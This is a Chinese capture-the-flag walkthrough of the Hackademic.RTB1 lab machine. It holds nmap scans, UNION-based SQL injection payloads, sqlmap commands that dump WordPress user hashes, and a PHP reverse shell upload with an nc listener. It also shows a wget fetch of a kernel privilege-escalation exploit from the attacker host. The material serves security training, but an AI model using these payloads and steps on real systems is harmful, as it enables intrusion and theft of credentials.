第二次打靶

靶机介绍：

1）靶机名称：2-Free-Hackademic.RTB1

2）靶机链接：

步骤：链接：https://pan.baidu.com/s/1IMWhKd3h8sDcPelzXXhxKg 提取码：o5k0

打靶过程：

1）启动靶机，选择网络模式为仅主机模式，由此可确定靶机地址段为192.168.56.0/24

2）通过nmap进行扫描，扫描192.168.56.0/24存活主机

#nmap -sP 192.168.56.0/24

通过扫描，确认靶机地址为192.168.56.104

3）使用nmap扫描该IP开放的所有端口

#nmap -p- 192.168.56.104

扫描发现，开放80端口

4）对每80端口进行工作服务的指纹扫描（应用服务版本信息等）

#nmap -p80 -sV -sC 192.168.56.104

5)访问web页面

http://192.168.56.104/

6）点击标题“Hackademic_RTB1”，出现如下页面

7）点击Got root，发现地址栏参数发生变化，http://192.168.56.104/Hackademic_RTB1/?p=9

8）对该URL进行SQL注入测试，判断是否存在SQL注入漏洞

http://192.168.56.104/Hackademic_RTB1/?p=9
http://192.168.56.104/Hackademic_RTB1/?p=9'

页面无明显变化，说明此处无SQL注入漏洞

9）点击上述页面最下方的“Uncategorized”发现，URL中的参数发生了变化

10）对上述URL进行SQL注入测试,页面发生了变化，说明存在SQL注入漏洞

http://192.168.56.104/Hackademic_RTB1/?cat=1
http://192.168.56.104/Hackademic_RTB1/?cat=1'

11）手动测试

http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 6
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,2,3,4,5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,databases(),3,4,5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='wp_users'

12）SQLmap自动注入

①检测数据库类型，证明是否存在sql注入漏洞

# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --batch

②获取数据库

# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  --dbs --batch

③获取wordpress数据库中的数据表

#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  -D "wordpress" --tables --batch

④获取wp_users表中的所有字段

#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  -D "wordpress" -T "wp_users" --columns --batch

⑤获取user_login和user_pass中的数据

#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL  -D "wordpress" -T "wp_users" -C user_login,user_pass --dump --batch

13）最后一个用户JohnSmith的user_pass通过md5进行了加密，可以对其进行破解

https://md5.gromweb.com/

14）通过dirserach对网站目录进行扫描，查看是否可以扫描出web站点的后台管理页面

# dirsearch -u "http://192.168.56.104"
# dirsearch -u "http://192.168.56.104/Hackademic_RTB1/"

15）通过访问扫描出的目录，发现了web站点后台地址

http://192.168.56.104/Hackademic_RTB1/wp-admin/

16）通过SQL注入出来的用户“GeorgeMiller”登入后台后，配置其可以上传的文件类型有php，并点击更新配置

17）上一步配置完成，后生成一个upload选线，运行上传PHP文件

18）下载PHP反弹shell脚本文件，并在upLoad页面进行上传

#php反弹shell脚本文件下载地址
https://pentestmonkey.net/tools/web-shells/php-reverse-shell

下载完成后，设置脚本中IP地址为kali主机地址（192.168.56.103）

上传成功后，返回如下页面及地址：href='/Hackademic_RTB1/wp-content/reverse.php

19）在Kali主机通过nc监听脚本中设置的端口（1234），并在浏览器访问刚才上传的php脚本文件

#nc -lvvp 1234
浏览器访问：http://192.168.56.104/Hackademic_RTB1/wp-content/reverse.php

此时已经成功反弹shell

20）查看当前用户是否具有sudo权限，提示必须要有一个控制终端

$sudo -s

21）查看当前主机内核为2.6.31

$uname -a

22）在kali主机搜索2.6.31内核对应的本地权限提示脚本

#searchsploit 2.6.3|grep -i "local privilege escalation"

23）将选定的提权脚本复制到Kali本机站点目录下，并启动httpd服务

# cp /usr/share/exploitdb/exploits/linux/local/15285.c /var/www/html
# systemctl restart apache2

24）在反弹shell成功后的主机，将上述脚本下载下来

$ cd /tmp
$ wget http://192.168.56.103/15285.c

25）通过gcc编译

$ gcc -o exp 15285.c
$ ls
$ chmod +x exp

26）获取flag

#cd /root
#ls
#cat key.txt